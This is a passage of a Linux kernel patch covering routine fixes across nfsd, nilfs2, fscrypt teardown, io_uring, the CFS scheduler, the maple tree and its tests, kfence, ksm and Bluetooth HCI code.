+ 	if (rqstp->rq_res.page_len == 0)	// first call
+ 		rqstp->rq_res.page_base = offset % PAGE_SIZE;
+ 	rqstp->rq_res.page_len += sd->len;
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index b4041d0566a9a..ef9f9a2511b72 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -71,7 +71,7 @@ static int nilfs_ioctl_wrap_copy(struct the_nilfs *nilfs,
+ 	if (argv->v_index > ~(__u64)0 - argv->v_nmembs)
+ 		return -EINVAL;
+ 
+-	buf = (void *)__get_free_pages(GFP_NOFS, 0);
++	buf = (void *)get_zeroed_page(GFP_NOFS);
+ 	if (unlikely(!buf))
+ 		return -ENOMEM;
+ 	maxmembs = PAGE_SIZE / argv->v_size;
+diff --git a/fs/super.c b/fs/super.c
+index 4f8a626a35cd9..7c140ee60c547 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -476,13 +476,22 @@ void generic_shutdown_super(struct super_block *sb)
+ 
+ 		cgroup_writeback_umount();
+ 
+-		/* evict all inodes with zero refcount */
++		/* Evict all inodes with zero refcount. */
+ 		evict_inodes(sb);
+-		/* only nonzero refcount inodes can have marks */
++
++		/*
++		 * Clean up and evict any inodes that still have references due
++		 * to fsnotify or the security policy.
++		 */
+ 		fsnotify_sb_delete(sb);
+-		fscrypt_destroy_keyring(sb);
+ 		security_sb_delete(sb);
+ 
++		/*
++		 * Now that all potentially-encrypted inodes have been evicted,
++		 * the fscrypt keyring can be destroyed.
++		 */
++		fscrypt_destroy_keyring(sb);
++
+ 		if (sb->s_dio_done_wq) {
+ 			destroy_workqueue(sb->s_dio_done_wq);
+ 			sb->s_dio_done_wq = NULL;
+diff --git a/fs/verity/verify.c b/fs/verity/verify.c
+index bde8c9b7d25f6..e23d382fc94b2 100644
+--- a/fs/verity/verify.c
++++ b/fs/verity/verify.c
+@@ -269,15 +269,15 @@ EXPORT_SYMBOL_GPL(fsverity_enqueue_verify_work);
+ int __init fsverity_init_workqueue(void)
+ {
+ 	/*
+-	 * Use an unbound workqueue to allow bios to be verified in parallel
+-	 * even when they happen to complete on the same CPU.  This sacrifices
+-	 * locality, but it's worthwhile since hashing is CPU-intensive.
++	 * Use a high-priority workqueue to prioritize verification work, which
++	 * blocks reads from completing, over regular application tasks.
+ 	 *
+-	 * Also use a high-priority workqueue to prioritize verification work,
+-	 * which blocks reads from completing, over regular application tasks.
++	 * For performance reasons, don't use an unbound workqueue.  Using an
++	 * unbound workqueue for crypto operations causes excessive scheduler
++	 * latency on ARM64.
+ 	 */
+ 	fsverity_read_workqueue = alloc_workqueue("fsverity_read_queue",
+-						  WQ_UNBOUND | WQ_HIGHPRI,
++						  WQ_HIGHPRI,
+ 						  num_online_cpus());
+ 	if (!fsverity_read_workqueue)
+ 		return -ENOMEM;
+diff --git a/include/linux/acpi_mdio.h b/include/linux/acpi_mdio.h
+index 0a24ab7cb66fa..8e2eefa9fbc0f 100644
+--- a/include/linux/acpi_mdio.h
++++ b/include/linux/acpi_mdio.h
+@@ -9,7 +9,14 @@
+ #include <linux/phy.h>
+ 
+ #if IS_ENABLED(CONFIG_ACPI_MDIO)
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode);
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner);
++
++static inline int
++acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *handle)
++{
++	return __acpi_mdiobus_register(mdio, handle, THIS_MODULE);
++}
+ #else /* CONFIG_ACPI_MDIO */
+ static inline int
+ acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index d4afa8508a806..3a7909ed54980 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -96,6 +96,7 @@ static inline void user_exit_irqoff(void) { }
+ static inline int exception_enter(void) { return 0; }
+ static inline void exception_exit(enum ctx_state prev_ctx) { }
+ static inline int ct_state(void) { return -1; }
++static inline int __ct_state(void) { return -1; }
+ static __always_inline bool context_tracking_guest_enter(void) { return false; }
+ static inline void context_tracking_guest_exit(void) { }
+ #define CT_WARN_ON(cond) do { } while (0)
+diff --git a/include/linux/context_tracking_state.h b/include/linux/context_tracking_state.h
+index 4a4d56f771802..fdd537ea513ff 100644
+--- a/include/linux/context_tracking_state.h
++++ b/include/linux/context_tracking_state.h
+@@ -46,7 +46,9 @@ struct context_tracking {
+ 
+ #ifdef CONFIG_CONTEXT_TRACKING
+ DECLARE_PER_CPU(struct context_tracking, context_tracking);
++#endif
+ 
++#ifdef CONFIG_CONTEXT_TRACKING_USER
+ static __always_inline int __ct_state(void)
+ {
+ 	return arch_atomic_read(this_cpu_ptr(&context_tracking.state)) & CT_STATE_MASK;
+diff --git a/include/linux/lockd/xdr4.h b/include/linux/lockd/xdr4.h
+index 9a6b55da8fd64..72831e35dca32 100644
+--- a/include/linux/lockd/xdr4.h
++++ b/include/linux/lockd/xdr4.h
+@@ -22,6 +22,7 @@
+ #define	nlm4_fbig		cpu_to_be32(NLM_FBIG)
+ #define	nlm4_failed		cpu_to_be32(NLM_FAILED)
+ 
++void	nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len);
+ bool	nlm4svc_decode_void(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_testargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_lockargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+diff --git a/include/linux/nvme-tcp.h b/include/linux/nvme-tcp.h
+index 75470159a194d..57ebe1267f7fb 100644
+--- a/include/linux/nvme-tcp.h
++++ b/include/linux/nvme-tcp.h
+@@ -115,8 +115,9 @@ struct nvme_tcp_icresp_pdu {
+ struct nvme_tcp_term_pdu {
+ 	struct nvme_tcp_hdr	hdr;
+ 	__le16			fes;
+-	__le32			fei;
+-	__u8			rsvd[8];
++	__le16			feil;
++	__le16			feiu;
++	__u8			rsvd[10];
+ };
+ 
+ /**
+diff --git a/include/linux/of_mdio.h b/include/linux/of_mdio.h
+index da633d34ab866..8a52ef2e6fa6b 100644
+--- a/include/linux/of_mdio.h
++++ b/include/linux/of_mdio.h
+@@ -14,9 +14,25 @@
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ bool of_mdiobus_child_is_phy(struct device_node *child);
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np);
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np);
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner);
++
++static inline int of_mdiobus_register(struct mii_bus *mdio,
++				      struct device_node *np)
++{
++	return __of_mdiobus_register(mdio, np, THIS_MODULE);
++}
++
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner);
++
++static inline int devm_of_mdiobus_register(struct device *dev,
++					   struct mii_bus *mdio,
++					   struct device_node *np)
++{
++	return __devm_of_mdiobus_register(dev, mdio, np, THIS_MODULE);
++}
++
+ struct mdio_device *of_mdio_find_device(struct device_node *np);
+ struct phy_device *of_phy_find_device(struct device_node *phy_np);
+ struct phy_device *
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index 313edd19bf545..d82ff9fa1a6e8 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -215,7 +215,7 @@ struct plat_stmmacenet_data {
+ 	int unicast_filter_entries;
+ 	int tx_fifo_size;
+ 	int rx_fifo_size;
+-	u32 addr64;
++	u32 host_dma_width;
+ 	u32 rx_queues_to_use;
+ 	u32 tx_queues_to_use;
+ 	u8 rx_sched_algorithm;
+diff --git a/include/linux/sysfb.h b/include/linux/sysfb.h
+index 8ba8b5be55675..c1ef5fc60a3cb 100644
+--- a/include/linux/sysfb.h
++++ b/include/linux/sysfb.h
+@@ -70,11 +70,16 @@ static inline void sysfb_disable(void)
+ #ifdef CONFIG_EFI
+ 
+ extern struct efifb_dmi_info efifb_dmi_list[];
+-void sysfb_apply_efi_quirks(struct platform_device *pd);
++void sysfb_apply_efi_quirks(void);
++void sysfb_set_efifb_fwnode(struct platform_device *pd);
+ 
+ #else /* CONFIG_EFI */
+ 
+-static inline void sysfb_apply_efi_quirks(struct platform_device *pd)
++static inline void sysfb_apply_efi_quirks(void)
++{
++}
++
++static inline void sysfb_set_efifb_fwnode(struct platform_device *pd)
+ {
+ }
+ 
+diff --git a/io_uring/filetable.c b/io_uring/filetable.c
+index 68dfc6936aa72..b80614e7d6051 100644
+--- a/io_uring/filetable.c
++++ b/io_uring/filetable.c
+@@ -19,6 +19,9 @@ static int io_file_bitmap_get(struct io_ring_ctx *ctx)
+ 	unsigned long nr = ctx->file_alloc_end;
+ 	int ret;
+ 
++	if (!table->bitmap)
++		return -ENFILE;
++
+ 	do {
+ 		ret = find_next_zero_bit(table->bitmap, nr, table->alloc_hint);
+ 		if (ret != nr)
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 4fdc2770bbe44..f6d8b02387a9d 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -47,6 +47,7 @@ struct io_connect {
+ 	struct sockaddr __user		*addr;
+ 	int				addr_len;
+ 	bool				in_progress;
++	bool				seen_econnaborted;
+ };
+ 
+ struct io_sr_msg {
+@@ -1404,7 +1405,7 @@ int io_connect_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 
+ 	conn->addr = u64_to_user_ptr(READ_ONCE(sqe->addr));
+ 	conn->addr_len =  READ_ONCE(sqe->addr2);
+-	conn->in_progress = false;
++	conn->in_progress = conn->seen_econnaborted = false;
+ 	return 0;
+ }
+ 
+@@ -1441,18 +1442,24 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	ret = __sys_connect_file(req->file, &io->address,
+ 					connect->addr_len, file_flags);
+-	if ((ret == -EAGAIN || ret == -EINPROGRESS) && force_nonblock) {
++	if ((ret == -EAGAIN || ret == -EINPROGRESS || ret == -ECONNABORTED)
++	    && force_nonblock) {
+ 		if (ret == -EINPROGRESS) {
+ 			connect->in_progress = true;
+-		} else {
+-			if (req_has_async_data(req))
+-				return -EAGAIN;
+-			if (io_alloc_async_data(req)) {
+-				ret = -ENOMEM;
++			return -EAGAIN;
++		}
++		if (ret == -ECONNABORTED) {
++			if (connect->seen_econnaborted)
+ 				goto out;
+-			}
+-			memcpy(req->async_data, &__io, sizeof(__io));
++			connect->seen_econnaborted = true;
++		}
++		if (req_has_async_data(req))
++			return -EAGAIN;
++		if (io_alloc_async_data(req)) {
++			ret = -ENOMEM;
++			goto out;
+ 		}
++		memcpy(req->async_data, &__io, sizeof(__io));
+ 		return -EAGAIN;
+ 	}
+ 	if (ret == -ERESTARTSYS)
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 185d5dfb7d569..4426d0e15174f 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -779,6 +779,7 @@ void __io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	}
+ #endif
+ 	io_free_file_tables(&ctx->file_table);
++	io_file_table_set_alloc_range(ctx, 0, 0);
+ 	io_rsrc_data_free(ctx->file_data);
+ 	ctx->file_data = NULL;
+ 	ctx->nr_user_files = 0;
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 211f63e87c637..64706723624b9 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -969,7 +969,7 @@ static int __init bpf_jit_charge_init(void)
+ {
+ 	/* Only used as heuristic here to derive limit. */
+ 	bpf_jit_limit_max = bpf_jit_alloc_exec_limit();
+-	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 2,
++	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 1,
+ 					    PAGE_SIZE), LONG_MAX);
+ 	return 0;
+ }
+diff --git a/kernel/entry/common.c b/kernel/entry/common.c
+index 846add8394c41..be61332c66b54 100644
+--- a/kernel/entry/common.c
++++ b/kernel/entry/common.c
+@@ -21,7 +21,7 @@ static __always_inline void __enter_from_user_mode(struct pt_regs *regs)
+ 	arch_enter_from_user_mode(regs);
+ 	lockdep_hardirqs_off(CALLER_ADDR0);
+ 
+-	CT_WARN_ON(ct_state() != CONTEXT_USER);
++	CT_WARN_ON(__ct_state() != CONTEXT_USER);
+ 	user_exit_irqoff();
+ 
+ 	instrumentation_begin();
+@@ -192,13 +192,14 @@ static unsigned long exit_to_user_mode_loop(struct pt_regs *regs,
+ 
+ static void exit_to_user_mode_prepare(struct pt_regs *regs)
+ {
+-	unsigned long ti_work = read_thread_flags();
++	unsigned long ti_work;
+ 
+ 	lockdep_assert_irqs_disabled();
+ 
+ 	/* Flush pending rcuog wakeup before the last need_resched() check */
+ 	tick_nohz_user_enter_prepare();
+ 
++	ti_work = read_thread_flags();
+ 	if (unlikely(ti_work & EXIT_TO_USER_MODE_WORK))
+ 		ti_work = exit_to_user_mode_loop(regs, ti_work);
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 227ada7240295..2aa286b4151b3 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -3830,7 +3830,7 @@ ctx_sched_in(struct perf_event_context *ctx,
+ 	if (likely(!ctx->nr_events))
+ 		return;
+ 
+-	if (is_active ^ EVENT_TIME) {
++	if (!(is_active & EVENT_TIME)) {
+ 		/* start ctx time */
+ 		__update_context_time(ctx, false);
+ 		perf_cgroup_set_timestamp(cpuctx);
+@@ -9009,7 +9009,7 @@ static void perf_event_bpf_output(struct perf_event *event, void *data)
+ 
+ 	perf_event_header__init_id(&bpf_event->event_id.header,
+ 				   &sample, event);
+-	ret = perf_output_begin(&handle, data, event,
++	ret = perf_output_begin(&handle, &sample, event,
+ 				bpf_event->event_id.header.size);
+ 	if (ret)
+ 		return;
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index f730b6fe94a7f..9ebfd484189b3 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2082,6 +2082,9 @@ static inline void dequeue_task(struct rq *rq, struct task_struct *p, int flags)
+ 
+ void activate_task(struct rq *rq, struct task_struct *p, int flags)
+ {
++	if (task_on_rq_migrating(p))
++		flags |= ENQUEUE_MIGRATED;
++
+ 	enqueue_task(rq, p, flags);
+ 
+ 	p->on_rq = TASK_ON_RQ_QUEUED;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 2c3d0d49c80ea..88821ab009b30 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4636,6 +4636,29 @@ static void check_spread(struct cfs_rq *cfs_rq, struct sched_entity *se)
+ #endif
+ }
+ 
++static inline bool entity_is_long_sleeper(struct sched_entity *se)
++{
++	struct cfs_rq *cfs_rq;
++	u64 sleep_time;
++
++	if (se->exec_start == 0)
++		return false;
++
++	cfs_rq = cfs_rq_of(se);
++
++	sleep_time = rq_clock_task(rq_of(cfs_rq));
++
++	/* Happen while migrating because of clock task divergence */
++	if (sleep_time <= se->exec_start)
++		return false;
++
++	sleep_time -= se->exec_start;
++	if (sleep_time > ((1ULL << 63) / scale_load_down(NICE_0_LOAD)))
++		return true;
++
++	return false;
++}
++
+ static void
+ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ {
+@@ -4669,8 +4692,29 @@ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ 		vruntime -= thresh;
+ 	}
+ 
+-	/* ensure we never gain time by being placed backwards. */
+-	se->vruntime = max_vruntime(se->vruntime, vruntime);
++	/*
++	 * Pull vruntime of the entity being placed to the base level of
++	 * cfs_rq, to prevent boosting it if placed backwards.
++	 * However, min_vruntime can advance much faster than real time, with
++	 * the extreme being when an entity with the minimal weight always runs
++	 * on the cfs_rq. If the waking entity slept for a long time, its
++	 * vruntime difference from min_vruntime may overflow s64 and their
++	 * comparison may get inversed, so ignore the entity's original
++	 * vruntime in that case.
++	 * The maximal vruntime speedup is given by the ratio of normal to
++	 * minimal weight: scale_load_down(NICE_0_LOAD) / MIN_SHARES.
++	 * When placing a migrated waking entity, its exec_start has been set
++	 * from a different rq. In order to take into account a possible
++	 * divergence between new and prev rq's clocks task because of irq and
++	 * stolen time, we take an additional margin.
++	 * So, cutting off on the sleep time of
++	 *     2^63 / scale_load_down(NICE_0_LOAD) ~ 104 days
++	 * should be safe.
++	 */
++	if (entity_is_long_sleeper(se))
++		se->vruntime = vruntime;
++	else
++		se->vruntime = max_vruntime(se->vruntime, vruntime);
+ }
+ 
+ static void check_enqueue_throttle(struct cfs_rq *cfs_rq);
+@@ -4747,6 +4791,9 @@ enqueue_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
+ 
+ 	if (flags & ENQUEUE_WAKEUP)
+ 		place_entity(cfs_rq, se, 0);
++	/* Entity has migrated, no longer consider this task hot */
++	if (flags & ENQUEUE_MIGRATED)
++		se->exec_start = 0;
+ 
+ 	check_schedstat_required();
+ 	update_stats_enqueue_fair(cfs_rq, se, flags);
+@@ -7449,9 +7496,6 @@ static void migrate_task_rq_fair(struct task_struct *p, int new_cpu)
+ 	/* Tell new CPU we are migrated */
+ 	se->avg.last_update_time = 0;
+ 
+-	/* We have migrated, no longer consider this task hot */
+-	se->exec_start = 0;
+-
+ 	update_scan_period(p, new_cpu);
+ }
+ 
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index c4945f8adc119..2f37a6e68aa9f 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -339,7 +339,7 @@ static void move_to_next_cpu(void)
+ 	cpumask_clear(current_mask);
+ 	cpumask_set_cpu(next_cpu, current_mask);
+ 
+-	sched_setaffinity(0, current_mask);
++	set_cpus_allowed_ptr(current, current_mask);
+ 	return;
+ 
+  change_mode:
+@@ -446,7 +446,7 @@ static int start_single_kthread(struct trace_array *tr)
+ 
+ 	}
+ 
+-	sched_setaffinity(kthread->pid, current_mask);
++	set_cpus_allowed_ptr(kthread, current_mask);
+ 
+ 	kdata->kthread = kthread;
+ 	wake_up_process(kthread);
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 69cb44b035ec1..96be96a1f35dc 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5088,35 +5088,21 @@ static inline bool mas_rewind_node(struct ma_state *mas)
+  */
+ static inline bool mas_skip_node(struct ma_state *mas)
+ {
+-	unsigned char slot, slot_count;
+-	unsigned long *pivots;
+-	enum maple_type mt;
++	if (mas_is_err(mas))
++		return false;
+ 
+-	mt = mte_node_type(mas->node);
+-	slot_count = mt_slots[mt] - 1;
+ 	do {
+ 		if (mte_is_root(mas->node)) {
+-			slot = mas->offset;
+-			if (slot > slot_count) {
++			if (mas->offset >= mas_data_end(mas)) {
+ 				mas_set_err(mas, -EBUSY);
+ 				return false;
+ 			}
+ 		} else {
+ 			mas_ascend(mas);
+-			slot = mas->offset;
+-			mt = mte_node_type(mas->node);
+-			slot_count = mt_slots[mt] - 1;
+ 		}
+-	} while (slot > slot_count);
+-
+-	mas->offset = ++slot;
+-	pivots = ma_pivots(mas_mn(mas), mt);
+-	if (slot > 0)
+-		mas->min = pivots[slot - 1] + 1;
+-
+-	if (slot <= slot_count)
+-		mas->max = pivots[slot];
++	} while (mas->offset >= mas_data_end(mas));
+ 
++	mas->offset++;
+ 	return true;
+ }
+ 
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index ec847bf4dcb4d..f7364b9fee939 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2602,6 +2602,49 @@ static noinline void check_empty_area_window(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
++static noinline void check_empty_area_fill(struct maple_tree *mt)
++{
++	const unsigned long max = 0x25D78000;
++	unsigned long size;
++	int loop, shift;
++	MA_STATE(mas, mt, 0, 0);
++
++	mt_set_non_kernel(99999);
++	for (shift = 12; shift <= 16; shift++) {
++		loop = 5000;
++		size = 1 << shift;
++		while (loop--) {
++			mas_set(&mas, 0);
++			mas_lock(&mas);
++			MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != 0);
++			MT_BUG_ON(mt, mas.last != mas.index + size - 1);
++			mas_store_gfp(&mas, (void *)size, GFP_KERNEL);
++			mas_unlock(&mas);
++			mas_reset(&mas);
++		}
++	}
++
++	/* No space left. */
++	size = 0x1000;
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != -EBUSY);
++	rcu_read_unlock();
++
++	/* Fill a depth 3 node to the maximum */
++	for (unsigned long i = 629440511; i <= 629440800; i += 6)
++		mtree_store_range(mt, i, i + 5, (void *)i, GFP_KERNEL);
++	/* Make space in the second-last depth 4 node */
++	mtree_erase(mt, 631668735);
++	/* Make space in the last depth 4 node */
++	mtree_erase(mt, 629506047);
++	mas_reset(&mas);
++	/* Search from just after the gap in the second-last depth 4 */
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 629506048, 690000000, 0x5000) != 0);
++	rcu_read_unlock();
++	mt_set_non_kernel(0);
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2854,6 +2897,11 @@ static int maple_tree_seed(void)
+ 	check_empty_area_window(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_empty_area_fill(&tree);
++	mtree_destroy(&tree);
++
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/kfence/Makefile b/mm/kfence/Makefile
+index 0bb95728a7845..2de2a58d11a10 100644
+--- a/mm/kfence/Makefile
++++ b/mm/kfence/Makefile
+@@ -2,5 +2,5 @@
+ 
+ obj-y := core.o report.o
+ 
+-CFLAGS_kfence_test.o := -g -fno-omit-frame-pointer -fno-optimize-sibling-calls
++CFLAGS_kfence_test.o := -fno-omit-frame-pointer -fno-optimize-sibling-calls
+ obj-$(CONFIG_KFENCE_KUNIT_TEST) += kfence_test.o
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index 141788858b708..c3d04753806a2 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -727,10 +727,14 @@ static const struct seq_operations objects_sops = {
+ };
+ DEFINE_SEQ_ATTRIBUTE(objects);
+ 
+-static int __init kfence_debugfs_init(void)
++static int kfence_debugfs_init(void)
+ {
+-	struct dentry *kfence_dir = debugfs_create_dir("kfence", NULL);
++	struct dentry *kfence_dir;
+ 
++	if (!READ_ONCE(kfence_enabled))
++		return 0;
++
++	kfence_dir = debugfs_create_dir("kfence", NULL);
+ 	debugfs_create_file("stats", 0444, kfence_dir, NULL, &stats_fops);
+ 	debugfs_create_file("objects", 0400, kfence_dir, NULL, &objects_fops);
+ 	return 0;
+@@ -893,6 +897,8 @@ static int kfence_init_late(void)
+ 	}
+ 
+ 	kfence_init_enable();
++	kfence_debugfs_init();
++
+ 	return 0;
+ }
+ 
+diff --git a/mm/ksm.c b/mm/ksm.c
+index c19fcca9bc03d..cb272b6fde597 100644
+--- a/mm/ksm.c
++++ b/mm/ksm.c
+@@ -960,9 +960,15 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 
+ 		mm = mm_slot->slot.mm;
+ 		mmap_read_lock(mm);
++
++		/*
++		 * Exit right away if mm is exiting to avoid lockdep issue in
++		 * the maple tree
++		 */
++		if (ksm_test_exit(mm))
++			goto mm_exiting;
++
+ 		for_each_vma(vmi, vma) {
+-			if (ksm_test_exit(mm))
+-				break;
+ 			if (!(vma->vm_flags & VM_MERGEABLE) || !vma->anon_vma)
+ 				continue;
+ 			err = unmerge_ksm_pages(vma,
+@@ -971,6 +977,7 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 				goto error;
+ 		}
+ 
++mm_exiting:
+ 		remove_trailing_rmap_items(&mm_slot->rmap_list);
+ 		mmap_read_unlock(mm);
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index b2877a84ed19c..5cae089639848 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -1402,6 +1402,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 			unsigned int order, bool check_free, fpi_t fpi_flags)
+ {
+ 	int bad = 0;
++	bool skip_kasan_poison = should_skip_kasan_poison(page, fpi_flags);
+ 	bool init = want_init_on_free();
+ 
+ 	VM_BUG_ON_PAGE(PageTail(page), page);
+@@ -1476,7 +1477,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 	 * With hardware tag-based KASAN, memory tags must be set before the
+ 	 * page becomes unavailable via debug_pagealloc or arch_free_page.
+ 	 */
+-	if (!should_skip_kasan_poison(page, fpi_flags)) {
++	if (!skip_kasan_poison) {
+ 		kasan_poison_pages(page, order, init);
+ 
+ 		/* Memory is already initialized if KASAN did it internally. */
+diff --git a/mm/slab.c b/mm/slab.c
+index 59c8e28f7b6ab..62869bc3c2f9f 100644
+--- a/mm/slab.c
++++ b/mm/slab.c
+@@ -840,7 +840,7 @@ static int init_cache_node(struct kmem_cache *cachep, int node, gfp_t gfp)
+ 	return 0;
+ }
+ 
+-#if (defined(CONFIG_NUMA) && defined(CONFIG_MEMORY_HOTPLUG)) || defined(CONFIG_SMP)
++#if defined(CONFIG_NUMA) || defined(CONFIG_SMP)
+ /*
+  * Allocates and initializes node for a node on each slab cache, used for
+  * either memory or cpu hotplug.  If memory is being hot-added, the kmem_cache_node
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index b65c3aabcd536..334e308451f53 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2871,10 +2871,25 @@ int hci_recv_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 		return -ENXIO;
+ 	}
+ 
+-	if (hci_skb_pkt_type(skb) != HCI_EVENT_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ACLDATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_SCODATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ISODATA_PKT) {
++	switch (hci_skb_pkt_type(skb)) {
++	case HCI_EVENT_PKT:
++		break;
++	case HCI_ACLDATA_PKT:
++		/* Detect if ISO packet has been sent as ACL */
++		if (hci_conn_num(hdev, ISO_LINK)) {
++			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
++			__u8 type;
++
++			type = hci_conn_lookup_type(hdev, hci_handle(handle));
++			if (type == ISO_LINK)
++				hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
++		}
++		break;
++	case HCI_SCODATA_PKT:
++		break;
++	case HCI_ISODATA_PKT:
++		break;
++	default:
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 3eec688a88a92..f614f96c5c23d 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -643,6 +643,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 	cancel_work_sync(&hdev->cmd_sync_work);
+ 	cancel_work_sync(&hdev->reenable_adv_work);
+ 
++	mutex_lock(&hdev->cmd_sync_work_lock);
+ 	list_for_each_entry_safe(entry, tmp, &hdev->cmd_sync_work_list, list) {
+ 		if (entry->destroy)
+ 			entry->destroy(hdev, entry->data, -ECANCELED);
+@@ -650,6 +651,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 		list_del(&entry->list);
+ 		kfree(entry);
+ 	}
++	mutex_unlock(&hdev->cmd_sync_work_lock);
+ }
+ 
+ void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+@@ -2367,6 +2369,45 @@ static int hci_resume_advertising_sync(struct hci_dev *hdev)
+ 	return err;
+ }
+ 
++static int hci_pause_addr_resolution(struct hci_dev *hdev)
++{
++	int err;
++
++	if (!use_ll_privacy(hdev))
++		return 0;
++
++	if (!hci_dev_test_flag(hdev, HCI_LL_RPA_RESOLUTION))
++		return 0;
++
++	/* Cannot disable addr resolution if scanning is enabled or
++	 * when initiating an LE connection.
++	 */
++	if (hci_dev_test_flag(hdev, HCI_LE_SCAN) ||
++	    hci_lookup_le_connect(hdev)) {
++		bt_dev_err(hdev, "Command not allowed when scan/LE connect");
++		return -EPERM;
++	}
++
++	/* Cannot disable addr resolution if advertising is enabled. */
++	err = hci_pause_advertising_sync(hdev);
++	if (err) {
++		bt_dev_err(hdev, "Pause advertising failed: %d", err);
++		return err;
++	}
++
++	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
++	if (err)
++		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
++			   err);
++
++	/* Return if address resolution is disabled and RPA is not used. */
++	if (!err && scan_use_rpa(hdev))
++		return err;
++
++	hci_resume_advertising_sync(hdev);
++	return err;
++}
++
+ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+ 					     bool extended, struct sock *sk)
+ {
+@@ -2402,7 +2443,7 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 	u8 filter_policy;
+ 	int err;
+ 
+-	/* Pause advertising if resolving list can be used as controllers are
++	/* Pause advertising if resolving list can be used as controllers
+ 	 * cannot accept resolving list modifications while advertising.
+ 	 */
+ 	if (use_ll_privacy(hdev)) {
+@@ -3301,6 +3342,7 @@ static const struct hci_init_stage amp_init1[] = {
